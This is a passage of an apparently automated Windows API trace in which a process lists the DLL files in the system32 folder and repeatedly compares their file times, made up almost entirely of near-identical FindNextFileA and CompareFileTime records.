lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.893] CloseHandle (hObject=0x174) returned 1 [0075.893] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0075.893] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0075.893] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 0x61ea48 [0075.893] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.893] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.894] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.894] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.895] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.895] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.896] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.896] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.897] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.897] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] StrChrA (lpStart="cabinet.dll", wMatch=0x2e) returned=".dll" [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.898] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.898] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] 